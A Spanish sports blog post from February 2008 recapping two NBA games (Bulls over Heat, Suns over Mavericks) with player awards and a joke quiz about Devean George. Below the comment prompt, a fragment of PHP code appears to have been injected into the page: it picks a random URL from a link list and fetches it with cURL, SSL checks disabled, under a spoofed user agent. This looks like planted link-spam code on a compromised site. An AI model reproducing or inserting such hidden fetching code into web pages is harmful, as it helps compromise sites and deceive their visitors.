La crónica (14/02/08)

15 de February de 2008 por txusma

A las puertas del All-Star tan solo se han jugado 2 partidos esta madrugada en la NBA. Seguramente cuando se planificó el calendario se buscó colocar en esta fecha 2 partidos a priori interesantes, uno de cada conferencia, con equipos potentes, jugándose los primeros puestos… Si el Dallas – Phoenix entra en esta categoría, desgraciadamente no podemos decir lo mismo del Miami – Chicago, dos gigantes en horas bajas esta temporada.

La crónica:

Este último partido, que presumiblemente debería de haber enfrentado a dos equipos por las primeras plazas del Este, nos ha mostrado a dos conjuntos que suman la friolera de 30 de 73 partidos ganados. En esta batalla de las decepciones finalmente han resultado vencedores los Chicago Bulls, que liderados por Kirk Hinrich y Joe Smith han doblegado a unos tristísimos Heats en los que tan solo Dwyane Wade y Shawn Marion han ofrecido algo de resistencia. Hinrich, que aún está recuperándose de una lesión, ha salido desde el banquillo y ha acabado con 24 puntos, 7 rebotes y 4 asistencias. Los Bulls, mermados por las lesiones de Ben Gordon, Luol Deng y Ben Wallace, únicamente han tenido que vigilar a las estrellas de los Heat, Wade y Marion, que no han encontrado ningún tipo de ayuda del resto de sus compañeros.

El otro partido de la noche ha estado a la altura de lo que se esperaba. Los Suns han acabado doblegando a un equipo en el que esta noche  sólo Dirk Nowitzki y Jason Terry han dado la cara y en el que Josh Howard se ha perdido su segundo partido consecutivo por lesión. Steve Nash con 24 puntos y 13 asistencias y Amare Stoudamire y Leandro Barbosa con 26 puntos han liderado a los de Arizona, que sólo han capturado 8 rebotes ofensivos por 20 del rival. Si tenemos en cuenta que los Mavs se han quedado en 20 asistencias, queda claro que ambas franquicias esperan solucionar sus problemas con las adquisiciones de Shaquille O’Neal y Jason Kidd.

Y los premios del día:

MVP: Destacaremos a 2 jugadores hoy. Por una parte al alemán Dirk Nowitkzi, que en su casi solitaria lucha contra los Suns ha conseguido 36 puntos y 12 rebotes; y por el otro, a Dwyane Wade que ha realizado una completísima actuación con 30 puntos, 7 rebotes y 7 asistencias.

El rookie: Tan solo los rookies de Chicago, Joakim Noah y Aaron Gray, merecen ser nombrados hoy, y eso que no han anotado más que 4 puntos cada uno.

La sorpresa: Las bajas de los Bulls propician que el resto de jugadores de la plantilla asuman más responsabilidades. Éste es el caso de jugadores como Joe Smith, Tyrus Thomas, Andres Nocioni o Thabo Sefolosha, que hoy han sido los que han llevo el peso ofensivo del equipo.

La decepción: Si nosotros fuéramos Dwyane Wade o Shawn Marion, girásemos la vista y viéramos que nuestros compañeros son gente como Jason Williams y Ricky Davis, jugadores que han bajado sus prestaciones de forma alarmante, seguramente pediríamos el traspaso inmediatamente. ¡Suerte que los 2 están en último año de contrato!

Pasatiempos: ¿Porqué está aplaudiendo Devean George?

A) Se considera un tipo importante por haber parado un traspaso en la NBA.

B) Se considera un tipo importante por haber parado un traspaso que llevaría a Jason Kidd a los Mavs, como desean todos y cada uno de sus aficionados.

C) Dirk Nowitzki acaba de encestar uno de sus 31 lanzamientos.

D) Da ánimos a DeSagana Diop y le explica que si trabaja tanto como él podrá llegar a ser también un tipo tan importante como él.

E) Esta contento por su gran actuación (7 puntos) que seguramente le valdrá la renovación con su actual equipo en el caso de no acabar produciéndose el traspaso.

Solución: Seguramente sería la C, aunque lo que debería hacer Devean es estar lo más calladito posible y pensar en la que le espera cuando su equipo vuelva a jugar en casa.

El premio será un seminario impartido por el mismo George con el título “Cómo hacerse famoso en la NBA por causas ajenas a mi rendimiento en la cancha”. De momento ya hay otros jugadores NBA inscritos como Brian Cardinal, Sean Marks o Brian Scalabrine.

 

 

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>